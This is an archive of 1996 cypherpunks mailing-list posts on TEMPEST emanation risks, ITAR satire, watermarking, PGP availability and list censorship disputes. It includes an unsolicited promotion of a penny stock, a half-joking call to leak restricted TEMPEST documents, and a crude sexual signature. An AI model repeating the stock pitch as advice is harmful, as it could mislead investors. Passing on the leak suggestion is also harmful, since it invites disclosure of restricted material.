
And whilst on the subject of your "name", how is it pronounced?  Is it "low 
goes" (as in "Intel Inside"), or "low goss" (as in "Star Trek")?

> Logos out

May the force be with you,

Gary





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 5 Dec 1996 05:09:43 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <2D3FyD78w165w@bwalk.dm.com>
Message-ID: <199612051312.OAA01650@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM writes:
> Bryce <bryce@digicash.com> writes:
>
> > Yeah, my "rules" are mainly to intimidate newbies into holding
> > still long enough to be properly socialized.  Only the
> > Meta-Rule is inviolate.
> 
> "Cypher punks" have degenerated into an inbred cybermob whose goal in life
> is to "enforce" the "rules" that apply to "newbies" (more Cabal-speak) but
> not to the "in-crowd".

"Double standards" is the term that springs to mind ...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 5 Dec 1996 14:12:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Laptops, TEMPEST, chewing gum, and baling wire
In-Reply-To: <3.0.1.32.19961205114746.011fbf84@mail.teleport.com>
Message-ID: <v03007800aeccf76e9909@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 AM -0800 12/5/96, Alan Olsen wrote:

>Now the truly paranoia will not only cover their heads with tinfoil, they
>will cover their laptops as well.

Just be careful to remove the tinfoil prior to leaving the country. As you
know, tinfoil is an ITAR-controlled item.

(Pending the outcome of a court case, where a physics professor is
challenging the ITARs on the grounds that using aluminum or tin foil in his
physics lectures may subject him to imprisonment. That rolls of aluminum
foil are commonly available in supermarkets throughout the country--and
even at foreign sites!--does not mean the ITARs will not be enforced.)

The traditional "personal use exemption," such as for the tin foil
contained in chewing gum wrappers, is causing alarm in the Administration,
as NSA researchers have discovered that some users are gluing together many
gum wrappers to make RF shields. "We have notified Wrigley's Gum Company
that their wrappers may constitute illegal "hooks" and may violate the
ITARs even if any single wrapper is too small to be useful."

The Administration is working with industry to relax export controls on
tinfoil and other shielding substances. H-P and Intel have announced a
solution the Administration may find acceptable: exports of shielded
laptops would be allowed if special keystroke capture programs are
installed.

As Special Crytography Envoy David Aaron puts it, "This is for the
protection of the consumer, not for use by the government."

(When pressed to explain this, Ambassador Aaron admitted it made no sense
to him either, but that he was just following orders. He also acknowledged
that the Administration's policy appears to be held together by baling wire
and chewing gum, so the Administration has a special interest in the
wrapper issue.)

--Klaus! von Future Prime



--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Thu, 5 Dec 1996 14:19:50 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: Laptops and TEMPEST
Message-ID: <3.0.32.19961205141815.007404a8@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Thinking that LCD screens reduce the risks of emanation monitoring is a
dangerous misconception (at least under a high threat model).  LCDs'
current requirements are pretty small, and they only emanate a low magentic
and electrical field.  However, the gotcha with current laptops is their
backlighting.  Electric and magnetic fields are considerably higher
compared with a low-res/contrast device.

There are documents that circulate within certain security circles that
list just how noisy (and therefore easy to monitor) various off-the-shelf
machines are.  It would be an interesting project for some ham radio type
Cypherpunks to measure their machines, and publish the results.  Or, for
some well connected person just to scan and anonymously post such a
document to the list.  Of course, I'd never encourage anyone to do
something illegal.

Joel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 5 Dec 1996 14:18:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Laptops and TEMPEST
In-Reply-To: <1.5.4.32.19961205094443.003ac018@popd.ix.netcom.com>
Message-ID: <v03007801aeccfae46969@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:03 PM -0700 12/5/96, C. Kuethe wrote:

>Here's some more about that.  I use both the Texas Instruments ti85 and
>Hewlett Packard HP48 graphics calculators.  I was playing tetris on my ti85
>one day and had the radio on.  every now and then this funny noise would
>come out of my radio.  After a while I noticed it was sync'ed with a
>keypress on my calc.  So I tried some experiments, and I found that doing
>just about anything would emit a detectable signal.  Keep in mind that I was
>using a cheap radio, tuned to a 100kW radio stn and still could tune in a
>calc.  I tried
...
>and they all sound different.  My favorite was the for loop.... sounds like
>a diesel engine.  Maybe that's why my calc is running so slow.  it's only
...

Back in the Olden Days, we used to use these signals as sound output for
our computers. For example, on my Sol 20 computer (bought and soldered
together in 1978, in case anyone's interested).

There were various BASIC programs that ran various loops, thus generating
crude tones on nearby radios. And the games that were available had
routines which used radios as crude sound devices.

(None of which could hold a candle to my 1968 "amateur transmitters": neon
sign transformers, sending Morse code to my friend a mile or so away...it
was detectable on all AM bands! I never got a visit from the FCC, but I
only "transmitted" a few times.)

--Tim



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 5 Dec 1996 14:25:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [crypto] Avatar Protection?
In-Reply-To: <9612050108.AA07734@notesgw2.sybase.com>
Message-ID: <v03007802aeccfc52bf4e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:32 PM -0500 12/5/96, Nelson Minar wrote:

>Ah, the age-old question. This is the same question as "is there a way
>for me to show a web page to someone and not let them copy it?", "is
>there a way I can loan someone my CD and not let them copy it?", etc.
>If you have control of the viewer, the answer is trivially yes. If you
>don't, then it's not.
>
>Digital watermarks / fingerprints are one alternative - if someone
>steals it, you can at least prove whom it was stolen from. Or you
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>might be able to exploit some of the structure of VRML to show people
>an avatar but not ever reveal the *whole* thing for copying. But in
>general, this sort of problem seems to demand a social solution
>(intellectual property law), not technical.

Yes, you can perhaps show whom it was stolen _from_, i.e., the creator, but
not _who_ stole it.

Even in the case where each end recipient receives a uniquely watermarked
or marked image, e.g., where N different instances of the work are
instantiated, there are ways to obscure the source of the theft (or leak,
when one is using such techniques to detect leaks of confidential
information, a la the famous "canary traps"). To whit, M recipients of the
work can compare their copies and remove or modify the bits which don't
match up. This then yields only a "collusion set" the original creator can
narrow things down to. Enough to cast doubt on the M recipients, but
probably not enough to "probabalistically convict" them of a crime, unless
the crime is "conspiracy."

An interesting question. As Nelson notes, not something with easy technical
solutions.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Wed, 4 Dec 1996 18:11:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <32A44861.3619@gte.net>
Message-ID: <199612050209.PAA08297@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 03 Dec 1996 07:33:53 -0800, Dale Thorn wrote:

   Paul Foley wrote:
   > Do you indeed?  OK, I hereby demand that you set up a mailing list on
   > your computer for discussion of "censorship" on cypherpunks.

   I hear your demand, which you have a right to make, and I reject it,
   which is my right. You proved my point, that you could make the demand,
   and I further proved it, by saying no.  Is that clear enough?

Help!  Help!  I'm being censored!

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Justice, n.:
	A decision in your favor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@media.mit.edu>
Date: Thu, 5 Dec 1996 12:29:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [crypto] Avatar Protection?
In-Reply-To: <9612050108.AA07734@notesgw2.sybase.com>
Message-ID: <cpaiv6graus.fsf@hattrick.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Is there a way for a user to "view" the client's avatar (and in this
>sense, the user usually has to receive a copy of the code to render
>the avatar and render it on the local machine) but not save a copy?

Ah, the age-old question. This is the same question as "is there a way
for me to show a web page to someone and not let them copy it?", "is
there a way I can loan someone my CD and not let them copy it?", etc.
If you have control of the viewer, the answer is trivially yes. If you
don't, then it's not.

Digital watermarks / fingerprints are one alternative - if someone
steals it, you can at least prove whom it was stolen from. Or you
might be able to exploit some of the structure of VRML to show people
an avatar but not ever reveal the *whole* thing for copying. But in
general, this sort of problem seems to demand a social solution
(intellectual property law), not technical.

ObLogos: all things are true




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Scott" <SButler@chemson.com>
Date: Thu, 5 Dec 1996 07:03:49 -0800 (PST)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=cypherpunks+40toad+2Ecom+3B@chemson.com>
Subject: FW: Intellectual dishonesty
Message-ID: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961205150719Z-822@csa-ntx.chemson.com>
MIME-Version: 1.0
Content-Type: text/plain



>Timmy May wrote:
>
>>P.S. I certainly hope this "Logos" nym is not who I suspect it is, as this
>>will surely end our Real World friendship. A fucking bozo.
>                                                             ^^^^^^^^^^^^^^^^
>^^^
>
>Now ... now  Timothy.

If there is anyone reading this message in the U.K.....
Can you remember a television series featuring Ronnie Corbet..
"SORRY"

TIMOTHY !

Cheers Scott
:-D
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 5 Dec 1996 16:20:36 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Silence is not assent (re the Vulis nonsense)
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961206002012Z-6641@INET-05-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Dale Thorn

	... I believe that my idea above [asking John Gilmore to speak up,
	and if he doesn't, say to the list that he has declined to do so] is
still a
	great idea (if the subscribers are not afraid of confrontation), as it
	would tend to force the issue more into the open.

I don't know what you mean by "forcing the issue more into the open".
Do you mean the issue of John' s not replying, or of censorship per se?
 

If you mean "forcing the issue of John not defending himself on the
list", I don't see where the issue needs to be forced.   John has rarely
posted to the list since it started, and typically only announcements of
events or crypto papers/conferences, etc.; he does not engage in the
discussions at all.   I personally have no argument with his decision
over when he posts or what he cares to post about, or how much or how
little.   My own interest in the list has nothing to do with whether the
list owner is moved to defend himself or not.   I'm free to roam at
will, read or delete, post or unsubscribe, publicly and loudly or
privately & quietly.   I don't feel constrained in any way, shape or
form to stay or go or speak or stay quiet.   I make all my own decisions
about this and John never knows nor, I expect, suffers any concern over
it.  And vice-versa.   

I (and apparently many others) do not feel the need to discuss John's
decisions.  I, and others, are not bound, like geese flying in
formation, to follow his lead, nor are we going to fall apart at a loss
for direction if he fails to "show up".

	You mention what "others had overlooked".  How about this: Tim May sent
	a message the other day stating (in essence) that the whole
"censorship"
	thing was pretty much a size (rather than content) problem.  I posted
	that notion twice, and there has been *no* discussion of it, as far as
	I know.  Too bad Tim didn't post that at the beginning of the affair,
	since everyone apparently reads *his* mail.

What I meant by what "others had overlooked" was in regard of the
content of posted messages which I have read, not in regard of *which*
poster's messages are overlooked/not read by others.    

Tim can have whatever opinion he likes about censorship or size or
content, and none of us are under any obligation to either agree or
disagree with him.   On a libertarian/anarcho-capitalistic list like
this, the individuals who have elected to join and lurk or post are not
expected to do anything but follow their interest.  There are more than
1200 subscribers to the list; if each and everyone of them had decided
they had something to say to each other about the concept of the rights
of the person whose computer these messages are all flowing through,
that would have been their fortunate privilege to do, as no one has put
any limit to the number of messages allowed, from any one, during any
particular period of time.  (Of course they would all be expecting not
only that their particular message would be read, but that everyone
would absorb their wisdom, right.  Not!)

	>Frankly, most of the long-time members of the list would not need any
	> such statements of defense from John in order to appreciate the
nature
	> of the circumstance and the reasoning for his symbolic 'censorship'.

	I apologize in advance for this one, but I honestly think that
statement
	says more about acceptance of the Iron Boot principle than it says
about
	what really happened.  I for one am not an insider in any of the
various
	cliques that surround this list, so perhaps I missed something that
would
	explain it better to me.  I suppose you are referring to an unspoken
	understanding, but again, and for future reference, you might want to
	consider the non-long-time members and speak the unspoken, as it were.

What really happened is that, upon weighing the relative merits of
John's action vs Vulis' contributions, what John did was seen as more of
a benefit than a detriment, and this dimmed any arguments which might
have been raised against it.   It's not like everyone was clammoring for
the privilege of reading what Vulis had to say or there aren't any other
avenues to getting his literary works.

The "unspoken" understanding on the list is that it was started by a
couple of guys who happen to be very libertarian/cryptoanarchist in
their philosophy of life (not simply as it applies to cryptography, but
rather as cryptography relates to that philosophy).  I put "unspoken" in
quotes because there have been no end of discussion and comments and
replies and retorts and flames on this very subject in the past years
since I've been on the list (Oct '93, and it is actually what attracted
me to subscribing), so it has hardly gone unmentioned and to many is no
surprise, although is often difficult to for them to see or agree with.

I recommend that you go through the archives and do a little light
reading.  Your mind will soon be saturated with the flavor of the
underlying theme, and you will Understand.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 5 Dec 1996 16:42:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP 5.0??
In-Reply-To: <Pine.BSF.3.91.961204220740.16825A-100000@blacklodge.c2.net>
Message-ID: <199612060032.QAA29008@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


William Knowles <erehwon@c2.net> writes:

> Ares GodOfWar <ares@imaginet-us.net> writes:
>  
> Telnet to: all.net
> 
> login: your name
> Password: guest
> 
> Good Luck!

Wrong!  You must telnet to all.net, but the correct logname is
"getpgp" with no password.  It will ask you some questions (like are
you a US citizen), and then give you an export-controlled ftp
directory to go to.

As far as I know, however, PGP 5.0 is still in beta test, though you
can get a snapshot from there (in source form only).  They also have
source and binaries for the latest released version of PGP 3.

Does anyone know what happened to PGP 4, BTW?  Is that version number
just being skipped because it was used by Viacrypt or something?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 5 Dec 1996 17:11:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP in Russia
In-Reply-To: <TCPSMTP.16.12.5.9.1.8.2780269260.1406534@nycmetro.com>
Message-ID: <mJgHyD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


harka@nycmetro.com writes:

> Hi there,
> 
> it's been asked before but I don't know the current answer: Is the use
> of PGP legal in Russia? And if it's not, how are the chances of a
> foreigner in Russia using it anyway to get away with it?

Cryptography is outlawed in Russia (search the archives for my articles
circa April '95). You can probably get away with using it anyway, but
they just might make an example out of you. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Thu, 5 Dec 1996 16:55:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Laptops, TEMPEST, chewing gum, and baling wire
Message-ID: <3.0.1.32.19961205165527.01136a74@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:18 PM 12/5/96 -0800, Timothy C. May wrote:
>At 11:52 AM -0800 12/5/96, Alan Olsen wrote:
>
>>Now the truly paranoia will not only cover their heads with tinfoil, they
>>will cover their laptops as well.
>
>Just be careful to remove the tinfoil prior to leaving the country. As you
>know, tinfoil is an ITAR-controlled item.

"Curses! Foiled again!"


---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 5 Dec 1996 14:04:44 -0800 (PST)
To: dcsb-announce-plug@shipwright.com
Subject: New DCSB list for announcements
Message-ID: <v0300780aaeccf582de2d@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Thu, 5 Dec 1996 15:38:01 -0500 (EST)
From: Rich Lethin <lethin@ai.mit.edu>
To: dcsb@ai.mit.edu
Subject: New DCSB list for announcements
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Rich Lethin <lethin@ai.mit.edu>


By request, I've created a new DCSB mailing list,

	dcsb-announce@ai.mit.edu

which will be for DCSB-related announcements, only.  The ability to
post to the list will be restricted by Majordomo.  Subscriptions are
for folks who can't/don't/won't paw through the talk on the normal
DCSB mailing list and digest, but would like to hear about upcoming
lunches.

Because the lunch announcements will be sent to both the dcsb-announce
and dcsb lists, there's no need to be on both.

To subscribe, send an email

	To: dcsb-announce-request@ai.mit.edu
	Subject: irrelevant

	subscribe

Rich
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 5 Dec 1996 17:31:16 -0800 (PST)
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Laptops and TEMPEST
Message-ID: <199612060131.RAA19977@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:18 PM 12/5/96 -0800, Joel McNamara wrote:
>Thinking that LCD screens reduce the risks of emanation monitoring is a
>dangerous misconception (at least under a high threat model).  

I disagree that it's a "dangerous misconception" to believe that "LCD 
screens reduce the risks of emanation."

While it might be correct to say that it would be dangerous to believe that 
they ELIMINATE the risks, LCD displays would make it exceedingly difficult 
to read the screen remotely.  The main reason is that the LCD segments are 
activated in parallel, which means that the electronic noise associated with 
a particular row is a smeared product of each portion of the display.  This 
is quite unlike CRT's, in which individual pixel information is completely 
(well, except for color) demultiplexed by time.


> However, the gotcha with current laptops is their
>backlighting.  Electric and magnetic fields are considerably higher
>compared with a low-res/contrast device.

What does the backlighting have to do with anything?  The backlight and its 
noise is not modulated (at least, not in anything less than the optical 
band) by the imformation provided on the screen.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@c2.net
Date: Thu, 5 Dec 1996 17:27:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Welcome to cryptography
Message-ID: <199612060127.RAA27322@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cryptography mailing list!

Please save this message for future reference.  Thank you.

If you ever want to remove yourself from this mailing list,
you can send mail to <Majordomo@c2.net> with the following
command in the body of your email message:

    unsubscribe cryptography cypherpunks@toad.com

 Here's the general information for the list you've subscribed to,
 in case you don't already have it:

[Last updated on: Mon Dec  2 19:23:19 1996]
"Cryptography" is a low-noise mailing list devoted to cryptographic
technology and its political impact.

WHAT TOPICS ARE APPROPRIATE:
  "On topic" discussion includes technical aspects of cryptosystems,
  social repercussions of cryptosystems, and the politics of
  cryptography such as export controls or laws restricting cryptography.

  Discussions unrelated to cryptography are considered "off topic".

  Please try to keep your postings "on topic". In order to assure that
  the quality of postings to the mailing list remains high, repeated
  postings "off topic" may result in action being taken by the list
  moderators.

MODERATION POLICY:
  In order to keep the signal to noise ratio high, the mailing list
  will be moderated during its initial weeks of operation. This will
  be changed if it appears that the list will remain on topic without
  moderation.

TO POST: send mail with your message to 
     cryptography@c2.net

TO UNSUBSCRIBE: send mail to
     majordomo@c2.net
  with the line
     unsubscribe cryptography
  in the body of your mail.

IMPORTANT -- PLEASE READ:
  Please note that sending requests to unsubscribe to the mailing list
  itself is considered highly antisocial. If the software running the
  mailing list is not working and you cannot reach the moderator, the
  users of the mailing list will be utterly unable to help you, so
  sending requests to the list will only succeed in annoying them. If
  all else fails, send mail to postmaster, NOT to the mailing list. If
  you think you may have trouble remembering how to unsubscribe, then
  save this message forever -- do not simply try asking the mailing
  list for help.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Thu, 5 Dec 1996 17:56:26 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Logos -vs- Vulis
In-Reply-To: <32A67717.1E5D@gte.net>
Message-ID: <Pine.BSF.3.91.961205175325.29619A-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 4 Dec 1996, Dale Thorn wrote:

> I'm not
> opposed to paying some attention to decorum, but logic comes first,
> otherwise, you won't have a leg to stand on.

     Reasonable minds can differ on this subject. I think
decorum must come first. We must first stop 'shouting'
before logic may be heard.

Logos out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: angie@cpci.net
Date: Thu, 5 Dec 1996 18:27:36 -0800 (PST)
To: angie@cpci.net
Subject: SMILE :)
Message-ID: <199612060208.SAA13268@armenia.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


DentlCare Management, Inc. (DentlCare) is a publicly listed Nevada corporation founded for the purpose of acquiring dental health care facilities nationwide.  DentlCare has developed a model for the delivery of quality dental care to all segments of  its population.  DentlCare and subsidiaries provide innovative services and products to the dental marketplace, at affordable rates.

"Given the rapid success of this concept, it's no surprise that Wall Street has latched on to it.  In the past year eight PPMs have gone public, raising over $350 million in new capital.  Many of the stocks sell at better than 35 times earnings.  Some, like Med-Partners, are closer to 70 times."  Forbes Magazine, September 1995.

The DentlCare model provides a fully-operational dental health care facility and all management support to the dental professional on a "turn key" basis.  Because of its managerial efficiency and the volume of business created by aggressive advertising to the "fee-for-service patient" and participation in "managed care" dental plans, the model generates higher than average operating margins.

DentlCare provides business and practice management services to dentists through its wholly owned subsidiaries, which currently manage twelve fully operational clinics, along with one mobile dental team.  Through these contractual relationships, the Company manages the financial, administrative and marketing activities, allowing Dentists to concentrate on the delivery of high quality, affordable dental care to their patients.  The success of these operations indicates that the same concepts can be duplicated in major metropolitan areas throughout the United States.  The clinics are to be located in those regions of the country where the demographics support a high volume operation, mainly in large metropolitan areas or in cities where the percent of residents over age 65 exceeds 15% of the total population, or in areas which have strong Managed Care programs.

The Company's target market is the estimated 60% of the American public that do not have a dentist.  They will go to one only if they are in pain.  As badly as they need regular dental care, they avoid it because they are afraid of pain, expense, and humiliation.  The Company has so successfully addressed these three fears that 90% of the fee-for-service customer base are patients who have previously avoided regular dental care.

We believe this is a timely opportunity to invest on the ground floor of a new company with explosive growth potential.

Symbol:  DCMI
Exchange Listed: OTC: Bulletin Board
Shares Outstanding:  10.7 million
Current Price:  $3.00

For a FREE Investor Relation Package, simply email your request to the email address above and put MORE INFO in the subject line.  Be sure to include your complete name, address, and daytime phone number in the body of the email message.  All information MUST be provided.

You have just received a FREE special report designed to inform you of emerging growth companies.  If you wish to be removed from our mailing list, simply send your remove request to the email address above with REMOVE in the subject line.

The information contained in this report was provided by the companies featured and they are solely responsible for the accuracy and adequacy of the information provided.

*** This is an information notice only, not an offer to sell securities. ***






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tuvak@troi.iq-internet.com
Date: Thu, 5 Dec 1996 17:47:29 -0800 (PST)
To: All@On-The-Net
Subject: Control E-Mail Advertising
Message-ID: <199612060117.SAA02652@troi.iq-internet.com>
MIME-Version: 1.0
Content-Type: text/plain


We all love or hate advertising, it just depends on if it interests us ...

Advertisers want to send YOU E-Mail ... BUT, will it interest you???

Reply to this message with the names of your favorite magazines to receive messages from firms who would advertise in those publications.

Reply to this message with NO MAIL to prevent ANY commercial E-Mail from C.A.R.E. member firms.

Thank You,

The Red Pages and C.A.R.E.   ( 1-800-257-7831 )
"Concientious Advertising thru Responsible E-Mail"







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 5 Dec 1996 18:47:15 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Silence is not assent (re the Vulis nonsense)
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961206024657Z-7339@INET-05-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I see that my email came out a bit skewed, so I'm reformatting a
bit and resending to make it more readable:
-----------------------------------------------

From:	Dale Thorn

	... I believe that my idea above [asking John Gilmore to 	speak up, and
if he doesn't, say to the list that he has 
	declined to do so] is still a great idea (if the subscribers
	are not afraid of confrontation), as it would tend to force 
	the issue more into the open.


I don't know what you mean by "forcing the issue more into the open".
Do you mean the issue of John' s not replying, or of censorship per se?
 

If you mean "forcing the issue of John not defending himself on the
list", I don't see where the issue needs to be forced.   John has rarely
posted to the list since it started, and typically only announcements of
events or crypto papers/conferences, etc.; he does not engage in the
discussions at all.   I personally have no argument with his decision
over when he posts or what he cares to post about, or how much or how
little.   My own interest in the list has nothing to do with whether the
list owner is moved to defend himself or not.   I'm free to roam at
will, read or delete, post or unsubscribe, publicly and loudly or
privately & quietly.   I don't feel constrained in any way, shape or
form to stay or go or speak or stay quiet.   I make all my own decisions
about this and John never knows nor, I expect, suffers any concern over
it.  And vice-versa.   

I (and apparently many others) do not feel the need to discuss John's
decisions.  I, and others, are not bound, like geese flying in
formation, to follow his lead, nor are we going to fall apart at a loss
for direction if he fails to "show up".


	You mention what "others had overlooked".  How about 
	this: Tim May sent a message the other day stating 
	(in essence) that the whole "censorship" thing was 
	pretty much a size (rather than content) problem.  I 
	posted that notion twice, and there has been *no* 
	discussion of it, as far as I know.  Too bad Tim didn't 
	post that at the beginning of the affair, since everyone 
	apparently reads *his* mail.


What I meant by what "others had overlooked" was in regard of the
content of posted messages which I have read, not in regard of *which*
poster's messages are overlooked/not read by others.    

Tim can have whatever opinion he likes about censorship or size or
content, and none of us are under any obligation to either agree or
disagree with him.   On a libertarian/anarcho-capitalistic list like
this, the individuals who have elected to join and lurk or post are not
expected to do anything but follow their interest.  There are more than
1200 subscribers to the list; if each and everyone of them had decided
they had something to say to each other about the concept of the rights
of the person whose computer these messages are all flowing through,
that would have been their fortunate privilege to do, as no one has put
any limit to the number of messages allowed, from any one, during any
particular period of time.  (Of course they would all be expecting not
only that their particular message would be read, but that everyone
would absorb their wisdom, right.  Not!)


	>Frankly, most of the long-time members of the list 
	>would not need any such statements of defense from 
	>John in order to appreciate the nature of the 
	>circumstance and the reasoning for his symbolic 
	>'censorship'.

	I apologize in advance for this one, but I honestly think 
	that statement says more about acceptance of the Iron 
	Boot principle than it says about what really happened.  
	I for one am not an insider in any of the various cliques 
	that surround this list, so perhaps I missed something 
	that would explain it better to me.  I suppose you are 
	referring to an unspoken 	understanding, but again, 
	and for future reference, you might want to consider 
	the non-long-time members and speak the unspoken, 
	as it were.


What really happened is that, upon weighing the relative merits of
John's action vs Vulis' contributions, what John did was seen as more of
a benefit than a detriment, and this dimmed any arguments which might
have been raised against it.   It's not like everyone was clammoring for
the privilege of reading what Vulis had to say or there aren't any other
avenues to getting his literary works.

The "unspoken" understanding on the list is that it was started by a
couple of guys who happen to be very libertarian/cryptoanarchist in
their philosophy of life (not simply as it applies to cryptography, but
rather as cryptography relates to that philosophy).  I put "unspoken" in
quotes because there have been no end of discussion and comments and
replies and retorts and flames on this very subject in the past years
since I've been on the list (Oct '93, and it is actually what attracted
me to subscribing), so it has hardly gone unmentioned and to many is no
